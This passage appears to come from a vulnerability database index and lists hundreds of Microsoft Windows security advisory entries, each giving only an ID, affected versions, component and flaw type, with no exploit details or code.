NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88280] Microsoft Windows DCE/RPC information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows 